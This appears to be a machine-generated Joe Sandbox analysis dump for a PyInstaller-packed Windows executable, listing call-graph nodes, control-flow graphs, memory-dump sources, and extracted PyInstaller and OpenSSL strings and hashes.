7ffdfb0cd05e 100786->100787 100788 7ffdfb0c6180 new[] 7 API calls 100787->100788 100789 7ffdfb0cd073 100787->100789 100788->100789 100789->100780 100790->100780 100791->100780 100792->100779 100793 7ffdfb0d1230 GetSystemInfo 100794 7ffdfb0d1264 100793->100794 100795 7ffdfb120d10 100796 7ffdfb120d3c 100795->100796 100799 7ffdfb120d41 100795->100799 100803 7ffdfb144960 100796->100803 100798 7ffdfb120e44 100799->100798 100802 7ffdfb120e31 100799->100802 100807 7ffdfb15e170 8 API calls new[] 100799->100807 100802->100798 100808 7ffdfb15ffc0 11 API calls new[] 100802->100808 100804 7ffdfb144979 100803->100804 100806 7ffdfb144985 100803->100806 100809 7ffdfb144890 100804->100809 100806->100799 100807->100802 100808->100798 100810 7ffdfb1448ca 100809->100810 100812 7ffdfb1448da 100809->100812 100815 7ffdfb1443d0 100810->100815 100813 7ffdfb14492d 100812->100813 100814 7ffdfb1443d0 28 API calls 100812->100814 100813->100806 100814->100812 100835 7ffdfb1440d0 100815->100835 100817 7ffdfb1444ba 100819 7ffdfb1f2900 4 API calls 100817->100819 100821 7ffdfb14487b 100819->100821 100820 7ffdfb14448c 100820->100817 100822 7ffdfb0e3790 13 API calls 100820->100822 100825 7ffdfb14455e 100820->100825 100827 7ffdfb144578 100820->100827 100821->100812 100823 7ffdfb144514 100822->100823 100824 7ffdfb14451a 100823->100824 100823->100827 100824->100825 100826 7ffdfb14454f 00007FFE13343010 100824->100826 100825->100817 100865 7ffdfb121280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 100825->100865 100826->100825 100832 7ffdfb144601 100827->100832 100861 7ffdfb0c9170 7 API calls 100827->100861 100829 7ffdfb14477b 100862 7ffdfb13cf30 23 API calls new[] 100829->100862 100832->100825 100864 7ffdfb0e4b80 14 API calls 100832->100864 100833 7ffdfb1447a7 100833->100832 100863 7ffdfb121310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 100833->100863 100836 7ffdfb1440f2 100835->100836 100851 7ffdfb144384 100835->100851 100837 7ffdfb1440fb 100836->100837 100840 7ffdfb144113 100836->100840 100866 7ffdfb143fc0 7 API calls 100837->100866 100839 7ffdfb144106 100839->100820 100843 7ffdfb144152 100840->100843 100846 7ffdfb144303 100840->100846 100842 7ffdfb1441a4 100845 7ffdfb144c70 21 API calls 100842->100845 100843->100842 100867 7ffdfb143fc0 7 API calls 100843->100867 100848 7ffdfb1441e2 100845->100848 100846->100851 100873 7ffdfb143fc0 7 API calls 100846->100873 100847 7ffdfb144258 100870 7ffdfb0c9340 7 API calls 100847->100870 100849 7ffdfb14420b 100848->100849 100868 7ffdfb183ba0 7 API calls 100848->100868 100849->100847 100849->100851 100858 7ffdfb1442a2 100849->100858 100851->100820 100852 7ffdfb144269 100871 7ffdfb0c9340 7 API calls 100852->100871 100855 7ffdfb144293 100855->100820 100856 7ffdfb144226 100869 7ffdfb143fc0 7 API calls 100856->100869 100872 7ffdfb1822e0 18 API calls 100858->100872 100860 7ffdfb1442f4 100860->100820 100861->100829 100862->100833 100863->100832 100864->100825 100865->100817 100866->100839 100867->100842 100868->100856 100869->100849 100870->100852 100871->100855 100872->100860 100873->100851 100874 7ff6ba3b5628 100875 7ff6ba3b565f 100874->100875 100876 7ff6ba3b5642 100874->100876 100875->100876 100878 7ff6ba3b5672 CreateFileW 100875->100878 100899 7ff6ba3b4ee8 11 API calls memcpy_s 100876->100899 100880 7ff6ba3b56a6 100878->100880 100881 7ff6ba3b56dc 100878->100881 100879 7ff6ba3b5647 100900 7ff6ba3b4f08 11 API calls memcpy_s 100879->100900 100902 7ff6ba3b577c 59 API calls 3 library calls 100880->100902 100903 7ff6ba3b5c04 46 API calls 3 library calls 100881->100903 100885 7ff6ba3b56e1 100888 7ff6ba3b5710 100885->100888 100889 7ff6ba3b56e5 100885->100889 100886 7ff6ba3b564f 100901 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 100886->100901 100887 7ff6ba3b56b4 100891 7ff6ba3b56d1 CloseHandle 100887->100891 100892 7ff6ba3b56bb CloseHandle 100887->100892 100905 7ff6ba3b59c4 51 API calls 100888->100905 100904 7ff6ba3b4e7c 11 API calls 2 library calls 100889->100904 100895 7ff6ba3b565a 100891->100895 100892->100895 100896 7ff6ba3b571d 100906 7ff6ba3b5b00 21 API calls _fread_nolock 100896->100906 100898 7ff6ba3b56ef 100898->100895 100899->100879 100900->100886 100901->100895 100902->100887 100903->100885 100904->100898 100905->100896 100906->100898 100916 7ffdfaaf5c00 100917 7ffdfaaf5c1d 100916->100917 100918 7ffdfaaf5d23 100917->100918 100921 7ffdfaaf5d3e 100917->100921 100919 7ffdfaab127b SetLastError 100918->100919 100920 7ffdfaaf5d39 100919->100920 100921->100920 100922 7ffdfaab127b SetLastError 100921->100922 100922->100920 100923 7ffdfa9e0350 100924 7ffdfa9e0f30 100923->100924 100931 7ffdfa9e0368 100923->100931 100925 7ffdfa9e0e53 LoadLibraryA 100926 7ffdfa9e0e6d 100925->100926 100927 7ffdfa9e0e76 GetProcAddress 100926->100927 100926->100931 100927->100926 100929 7ffdfa9e0e97 100927->100929 100930 7ffdfa9e0ea2 VirtualProtect VirtualProtect 100930->100924 100931->100925 100931->100930 100932 7ffdfaacfd40 100933 7ffdfaacfd50 100932->100933 100934 7ffdfaacfd62 100933->100934 100938 7ffdfaab1df7 100933->100938 100942 7ffdfab0f070 100933->100942 100946 7ffdfaab14bf 100933->100946 100938->100934 100939 7ffdfab0eaa0 100938->100939 100940 7ffdfab0f1c1 SetLastError 100939->100940 100941 7ffdfab0f1d5 100939->100941 100940->100941 100941->100934 100943 7ffdfab0f180 100942->100943 100944 7ffdfab0f1c1 SetLastError 100943->100944 100945 7ffdfab0f1d5 100943->100945 100944->100945 100945->100934 100946->100934 100947 7ffdfab0e960 100946->100947 100948 7ffdfab0f1c1 SetLastError 100947->100948 100949 7ffdfab0f1d5 100947->100949 100948->100949 100949->100934

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 0 7ff6ba3a1000-7ff6ba3a3806 call 7ff6ba3afe18 call 7ff6ba3afe20 call 7ff6ba3ac850 call 7ff6ba3b53f0 call 7ff6ba3b5484 call 7ff6ba3a36b0 14 7ff6ba3a3814-7ff6ba3a3836 call 7ff6ba3a1950 0->14 15 7ff6ba3a3808-7ff6ba3a380f 0->15 21 7ff6ba3a391b-7ff6ba3a3931 call 7ff6ba3a45c0 14->21 22 7ff6ba3a383c-7ff6ba3a3856 call 7ff6ba3a1c80 14->22 16 7ff6ba3a3c97-7ff6ba3a3cb2 call 7ff6ba3ac550 15->16 27 7ff6ba3a3933-7ff6ba3a3960 call 7ff6ba3a7f90 21->27 28 7ff6ba3a396a-7ff6ba3a397f call 7ff6ba3a2710 21->28 26 7ff6ba3a385b-7ff6ba3a389b call 7ff6ba3a8830 22->26 33 7ff6ba3a38c1-7ff6ba3a38cc call 7ff6ba3b4f30 26->33 34 7ff6ba3a389d-7ff6ba3a38a3 26->34 40 7ff6ba3a3962-7ff6ba3a3965 call 7ff6ba3b004c 27->40 41 7ff6ba3a3984-7ff6ba3a39a6 call 7ff6ba3a1c80 27->41 42 7ff6ba3a3c8f 28->42 48 7ff6ba3a38d2-7ff6ba3a38e1 call 7ff6ba3a8830 33->48 49 7ff6ba3a39fc-7ff6ba3a3a2a call 7ff6ba3a8940 call 7ff6ba3a89a0 * 3 33->49 37 7ff6ba3a38af-7ff6ba3a38bd call 7ff6ba3a89a0 34->37 38 7ff6ba3a38a5-7ff6ba3a38ad 34->38 37->33 38->37 40->28 51 7ff6ba3a39b0-7ff6ba3a39b9 41->51 42->16 58 7ff6ba3a39f4-7ff6ba3a39f7 call 7ff6ba3b4f30 48->58 59 7ff6ba3a38e7-7ff6ba3a38ed 48->59 76 7ff6ba3a3a2f-7ff6ba3a3a3e call 7ff6ba3a8830 49->76 51->51 54 7ff6ba3a39bb-7ff6ba3a39d8 call 7ff6ba3a1950 51->54 54->26 65 7ff6ba3a39de-7ff6ba3a39ef call 7ff6ba3a2710 54->65 58->49 63 7ff6ba3a38f0-7ff6ba3a38fc 59->63 66 7ff6ba3a38fe-7ff6ba3a3903 63->66 67 7ff6ba3a3905-7ff6ba3a3908 63->67 65->42 66->63 66->67 67->58 70 7ff6ba3a390e-7ff6ba3a3916 call 7ff6ba3b4f30 67->70 70->76 79 7ff6ba3a3b45-7ff6ba3a3b53 76->79 80 7ff6ba3a3a44-7ff6ba3a3a47 76->80 82 7ff6ba3a3a67 79->82 83 7ff6ba3a3b59-7ff6ba3a3b5d 79->83 80->79 81 7ff6ba3a3a4d-7ff6ba3a3a50 80->81 84 7ff6ba3a3b14-7ff6ba3a3b17 81->84 85 7ff6ba3a3a56-7ff6ba3a3a5a 81->85 86 7ff6ba3a3a6b-7ff6ba3a3a90 call 7ff6ba3b4f30 82->86 83->86 88 7ff6ba3a3b2f-7ff6ba3a3b40 call 7ff6ba3a2710 84->88 89 7ff6ba3a3b19-7ff6ba3a3b1d 84->89 85->84 87 7ff6ba3a3a60 85->87 94 7ff6ba3a3a92-7ff6ba3a3aa6 call 7ff6ba3a8940 86->94 95 7ff6ba3a3aab-7ff6ba3a3ac0 86->95 87->82 97 7ff6ba3a3c7f-7ff6ba3a3c87 88->97 89->88 91 7ff6ba3a3b1f-7ff6ba3a3b2a 89->91 91->86 94->95 99 7ff6ba3a3ac6-7ff6ba3a3aca 95->99 100 7ff6ba3a3be8-7ff6ba3a3bfa call 7ff6ba3a8830 95->100 97->42 101 7ff6ba3a3ad0-7ff6ba3a3ae8 call 7ff6ba3b5250 99->101 102 7ff6ba3a3bcd-7ff6ba3a3be2 call 7ff6ba3a1940 99->102 107 7ff6ba3a3c2e 100->107 108 7ff6ba3a3bfc-7ff6ba3a3c02 100->108 111 7ff6ba3a3b62-7ff6ba3a3b7a call 7ff6ba3b5250 101->111 112 7ff6ba3a3aea-7ff6ba3a3b02 call 7ff6ba3b5250 101->112 102->99 102->100 115 7ff6ba3a3c31-7ff6ba3a3c40 call 7ff6ba3b4f30 107->115 113 7ff6ba3a3c1e-7ff6ba3a3c2c 108->113 114 7ff6ba3a3c04-7ff6ba3a3c1c 108->114 122 7ff6ba3a3b87-7ff6ba3a3b9f call 7ff6ba3b5250 111->122 123 7ff6ba3a3b7c-7ff6ba3a3b80 111->123 112->102 124 7ff6ba3a3b08-7ff6ba3a3b0f 112->124 113->115 114->115 125 7ff6ba3a3d41-7ff6ba3a3d63 call 7ff6ba3a44e0 115->125 126 7ff6ba3a3c46-7ff6ba3a3c4a 115->126 135 7ff6ba3a3ba1-7ff6ba3a3ba5 122->135 136 7ff6ba3a3bac-7ff6ba3a3bc4 call 7ff6ba3b5250 122->136 123->122 124->102 138 7ff6ba3a3d71-7ff6ba3a3d82 call 7ff6ba3a1c80 125->138 139 7ff6ba3a3d65-7ff6ba3a3d6f call 7ff6ba3a4630 125->139 128 7ff6ba3a3c50-7ff6ba3a3c5f call 7ff6ba3a90e0 126->128 129 7ff6ba3a3cd4-7ff6ba3a3ce6 call 7ff6ba3a8830 126->129 145 7ff6ba3a3c61 128->145 146 7ff6ba3a3cb3-7ff6ba3a3cbd call 7ff6ba3a8660 128->146 143 7ff6ba3a3d35-7ff6ba3a3d3c 129->143 144 7ff6ba3a3ce8-7ff6ba3a3ceb 129->144 135->136 136->102 157 7ff6ba3a3bc6 136->157 148 7ff6ba3a3d87-7ff6ba3a3d96 138->148 139->148 151 7ff6ba3a3c68 call 7ff6ba3a2710 143->151 144->143 153 7ff6ba3a3ced-7ff6ba3a3d10 call 7ff6ba3a1c80 144->153 145->151 163 7ff6ba3a3cbf-7ff6ba3a3cc6 146->163 164 7ff6ba3a3cc8-7ff6ba3a3ccf 146->164 154 7ff6ba3a3dc4-7ff6ba3a3dda call 7ff6ba3a9390 148->154 155 7ff6ba3a3d98-7ff6ba3a3d9f 148->155 165 7ff6ba3a3c6d-7ff6ba3a3c77 151->165 166 7ff6ba3a3d12-7ff6ba3a3d26 call 7ff6ba3a2710 call 7ff6ba3b4f30 153->166 167 7ff6ba3a3d2b-7ff6ba3a3d33 call 7ff6ba3b4f30 153->167 172 7ff6ba3a3de8-7ff6ba3a3e04 SetDllDirectoryW 154->172 173 7ff6ba3a3ddc 154->173 155->154 161 7ff6ba3a3da1-7ff6ba3a3da5 155->161 157->102 161->154 168 7ff6ba3a3da7-7ff6ba3a3dbe SetDllDirectoryW LoadLibraryExW 161->168 163->151 164->148 165->97 166->165 167->148 168->154 176 7ff6ba3a3f01-7ff6ba3a3f08 172->176 177 7ff6ba3a3e0a-7ff6ba3a3e19 call 7ff6ba3a8830 172->177 173->172 179 7ff6ba3a3f0e-7ff6ba3a3f15 176->179 180 7ff6ba3a4008-7ff6ba3a4010 176->180 189 7ff6ba3a3e32-7ff6ba3a3e3c call 7ff6ba3b4f30 177->189 190 7ff6ba3a3e1b-7ff6ba3a3e21 177->190 179->180 183 7ff6ba3a3f1b-7ff6ba3a3f25 call 7ff6ba3a33c0 179->183 184 7ff6ba3a4012-7ff6ba3a402f PostMessageW GetMessageW 180->184 185 7ff6ba3a4035-7ff6ba3a4040 call 7ff6ba3a36a0 call 7ff6ba3a3360 180->185 183->165 197 7ff6ba3a3f2b-7ff6ba3a3f3f call 7ff6ba3a90c0 183->197 184->185 199 7ff6ba3a4045-7ff6ba3a4067 call 7ff6ba3a3670 call 7ff6ba3a6fc0 call 7ff6ba3a6d70 185->199 200 7ff6ba3a3ef2-7ff6ba3a3efc call 7ff6ba3a8940 189->200 201 7ff6ba3a3e42-7ff6ba3a3e48 189->201 191 7ff6ba3a3e23-7ff6ba3a3e2b 190->191 192 7ff6ba3a3e2d-7ff6ba3a3e2f 190->192 191->192 192->189 210 7ff6ba3a3f41-7ff6ba3a3f5e PostMessageW GetMessageW 197->210 211 7ff6ba3a3f64-7ff6ba3a3fa7 call 7ff6ba3a8940 call 7ff6ba3a89e0 call 7ff6ba3a6fc0 call 7ff6ba3a6d70 call 7ff6ba3a88e0 197->211 200->176 201->200 205 7ff6ba3a3e4e-7ff6ba3a3e54 201->205 208 7ff6ba3a3e5f-7ff6ba3a3e61 205->208 209 7ff6ba3a3e56-7ff6ba3a3e58 205->209 208->176 214 7ff6ba3a3e67-7ff6ba3a3e83 call 7ff6ba3a6dc0 call 7ff6ba3a7340 208->214 209->214 215 7ff6ba3a3e5a 209->215 210->211 248 7ff6ba3a3ff5-7ff6ba3a4003 call 7ff6ba3a1900 211->248 249 7ff6ba3a3fa9-7ff6ba3a3fbf call 7ff6ba3a8ed0 call 7ff6ba3a88e0 211->249 228 7ff6ba3a3e8e-7ff6ba3a3e95 214->228 229 7ff6ba3a3e85-7ff6ba3a3e8c 214->229 215->176 230 7ff6ba3a3eaf-7ff6ba3a3eb9 call 7ff6ba3a71b0 228->230 231 7ff6ba3a3e97-7ff6ba3a3ea4 call 7ff6ba3a6e00 228->231 232 7ff6ba3a3edb-7ff6ba3a3ef0 call 7ff6ba3a2a50 call 7ff6ba3a6fc0 call 7ff6ba3a6d70 229->232 245 7ff6ba3a3ec4-7ff6ba3a3ed2 call 7ff6ba3a74f0 230->245 246 7ff6ba3a3ebb-7ff6ba3a3ec2 230->246 231->230 243 7ff6ba3a3ea6-7ff6ba3a3ead 231->243 232->176 243->232 245->176 258 7ff6ba3a3ed4 245->258 246->232 248->165 249->248 261 7ff6ba3a3fc1-7ff6ba3a3fd6 249->261 258->232 262 7ff6ba3a3ff0 call 7ff6ba3a2a50 261->262 263 7ff6ba3a3fd8-7ff6ba3a3feb call 7ff6ba3a2710 call 7ff6ba3a1900 261->263 262->248 263->165
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5769df13d4cb34b5a81c5f9880665c6c37022f6ebf483ec7a09b1a9e68fcb9e4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33326A26E0CBA291FF199B29D8553BD66A2AF44780F8440B6DF5DC32D6EF2CE559C300
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2781224710
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 95b3f3bddc84236b192caf630ae2ce91a3faca7ee34022f569e35d54b07e539a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2826A21B09B8285FB6CAB21D460BB933A1EF41784F9440B6DE6D476DDDF3CE54A8311

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 713 7ffdfb0d92b0-7ffdfb0d932f 714 7ffdfb0d9335-7ffdfb0d933f 713->714 715 7ffdfb0d948d-7ffdfb0d94a3 713->715 714->715 716 7ffdfb0d9345-7ffdfb0d9348 714->716 717 7ffdfb0d94a9-7ffdfb0d94af 715->717 718 7ffdfb0d939f-7ffdfb0d93e5 call 7ffdfb0c6180 715->718 716->717 721 7ffdfb0d934e 716->721 717->718 719 7ffdfb0d94b5-7ffdfb0d94cb call 7ffdfb0c6180 717->719 727 7ffdfb0d93eb-7ffdfb0d944f call 7ffdfb1f380c 718->727 728 7ffdfb0d9a7e-7ffdfb0d9a81 718->728 730 7ffdfb0d94d1-7ffdfb0d94ec 719->730 731 7ffdfb0d9ade 719->731 724 7ffdfb0d9355-7ffdfb0d935e 721->724 724->724 725 7ffdfb0d9360-7ffdfb0d936f call 7ffdfb0c6180 724->725 725->731 739 7ffdfb0d9375-7ffdfb0d938b 00007FFE13343010 725->739 743 7ffdfb0d9455-7ffdfb0d9471 00007FFE13343010 727->743 744 7ffdfb0d9778-7ffdfb0d9788 727->744 728->731 732 7ffdfb0d9a83-7ffdfb0d9a8a 728->732 746 7ffdfb0d9506-7ffdfb0d950d 730->746 747 7ffdfb0d94ee-7ffdfb0d94ff 730->747 735 7ffdfb0d9ae3-7ffdfb0d9afa 731->735 736 7ffdfb0d9a8c-7ffdfb0d9a96 732->736 737 7ffdfb0d9ad5 732->737 741 7ffdfb0d9a98 736->741 742 7ffdfb0d9a9e-7ffdfb0d9acb 736->742 737->731 745 7ffdfb0d9390-7ffdfb0d9397 739->745 741->742 742->731 767 7ffdfb0d9acd-7ffdfb0d9ad3 742->767 748 7ffdfb0d962b 743->748 749 7ffdfb0d9477-7ffdfb0d9488 00007FFE13343010 743->749 750 7ffdfb0d96cf-7ffdfb0d96f4 744->750 745->745 751 7ffdfb0d9399 745->751 755 7ffdfb0d9510-7ffdfb0d9517 746->755 747->746 754 7ffdfb0d962e-7ffdfb0d9677 00007FFE13343010 * 2 748->754 749->754 752 7ffdfb0d96fa-7ffdfb0d96ff 750->752 753 7ffdfb0d982f 750->753 751->718 752->753 757 7ffdfb0d9705-7ffdfb0d9731 call 7ffdfb0cffd0 752->757 758 7ffdfb0d9834-7ffdfb0d9842 753->758 759 7ffdfb0d9679-7ffdfb0d9680 754->759 760 7ffdfb0d96cd 754->760 755->755 761 7ffdfb0d9519-7ffdfb0d9520 755->761 768 7ffdfb0d9734-7ffdfb0d9754 757->768 763 7ffdfb0d9845-7ffdfb0d9848 758->763 764 7ffdfb0d976a-7ffdfb0d9773 759->764 765 7ffdfb0d9686-7ffdfb0d9690 759->765 760->750 766 7ffdfb0d9527-7ffdfb0d952e 761->766 769 7ffdfb0d98fb-7ffdfb0d9905 763->769 770 7ffdfb0d984e-7ffdfb0d9869 call 7ffdfb0d8830 763->770 764->760 771 7ffdfb0d9698-7ffdfb0d96c5 765->771 772 7ffdfb0d9692 765->772 766->766 773 7ffdfb0d9530-7ffdfb0d9547 766->773 767->731 776 7ffdfb0d982a-7ffdfb0d982d 768->776 777 7ffdfb0d975a-7ffdfb0d9764 768->777 774 7ffdfb0d9907-7ffdfb0d9910 769->774 775 7ffdfb0d9913-7ffdfb0d9926 call 7ffdfb0d46f0 769->775 770->769 797 7ffdfb0d986f-7ffdfb0d98f3 770->797 771->760 810 7ffdfb0d96c7 771->810 772->771 779 7ffdfb0d9549 773->779 780 7ffdfb0d9597-7ffdfb0d959e 773->780 774->775 804 7ffdfb0d992c-7ffdfb0d9936 775->804 805 7ffdfb0d9a70-7ffdfb0d9a7c 775->805 776->763 786 7ffdfb0d9766-7ffdfb0d9768 777->786 787 7ffdfb0d978d-7ffdfb0d9790 777->787 789 7ffdfb0d9550-7ffdfb0d9557 779->789 783 7ffdfb0d95c2-7ffdfb0d95c9 780->783 784 7ffdfb0d95a0-7ffdfb0d95a7 780->784 794 7ffdfb0d961a 783->794 795 7ffdfb0d95cb-7ffdfb0d95d5 783->795 784->718 792 7ffdfb0d95ad-7ffdfb0d95bc call 7ffdfb185ae0 784->792 796 7ffdfb0d9792-7ffdfb0d979a 786->796 787->796 798 7ffdfb0d9560-7ffdfb0d9569 789->798 792->718 792->783 812 7ffdfb0d9623-7ffdfb0d9626 794->812 806 7ffdfb0d95d7 795->806 807 7ffdfb0d95dd-7ffdfb0d960a 795->807 801 7ffdfb0d979c-7ffdfb0d97b0 call 7ffdfb0d7c00 796->801 802 7ffdfb0d97be-7ffdfb0d97d4 call 7ffdfb186ad0 796->802 818 7ffdfb0d9959-7ffdfb0d995f 797->818 819 7ffdfb0d98f5 797->819 798->798 808 7ffdfb0d956b-7ffdfb0d9579 798->808 801->802 827 7ffdfb0d97b2-7ffdfb0d97b7 801->827 828 7ffdfb0d97d6-7ffdfb0d97eb call 7ffdfb13df90 802->828 829 7ffdfb0d97ed 802->829 815 7ffdfb0d9938 804->815 816 7ffdfb0d993e-7ffdfb0d9951 804->816 805->735 806->807 807->812 834 7ffdfb0d960c-7ffdfb0d9615 807->834 809 7ffdfb0d9580-7ffdfb0d9589 808->809 809->809 820 7ffdfb0d958b-7ffdfb0d9595 809->820 810->760 812->735 815->816 816->818 825 7ffdfb0d9988-7ffdfb0d9998 818->825 826 7ffdfb0d9961-7ffdfb0d9984 818->826 819->769 820->780 820->789 840 7ffdfb0d999a 825->840 841 7ffdfb0d99a0-7ffdfb0d99d1 825->841 826->825 827->802 832 7ffdfb0d97ef-7ffdfb0d97f4 828->832 829->832 837 7ffdfb0d97f6-7ffdfb0d980c call 7ffdfb186ad0 832->837 838 7ffdfb0d9822-7ffdfb0d9828 832->838 834->735 837->776 846 7ffdfb0d980e-7ffdfb0d9820 call 7ffdfb13df90 837->846 838->758 840->841 844 7ffdfb0d99e4-7ffdfb0d99eb 841->844 845 7ffdfb0d99d3-7ffdfb0d99e2 841->845 847 7ffdfb0d99ef-7ffdfb0d9a11 call 7ffdfb0d7c00 844->847 845->847 846->776 846->838 852 7ffdfb0d9a19-7ffdfb0d9a1c 847->852 853 7ffdfb0d9a13-7ffdfb0d9a17 847->853 855 7ffdfb0d9a23 852->855 856 7ffdfb0d9a1e-7ffdfb0d9a21 852->856 854 7ffdfb0d9a27-7ffdfb0d9a39 853->854 857 7ffdfb0d9a3b-7ffdfb0d9a42 854->857 858 7ffdfb0d9a44-7ffdfb0d9a56 854->858 855->854 856->854 856->855 859 7ffdfb0d9a5a-7ffdfb0d9a6e 857->859 858->859 859->735
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
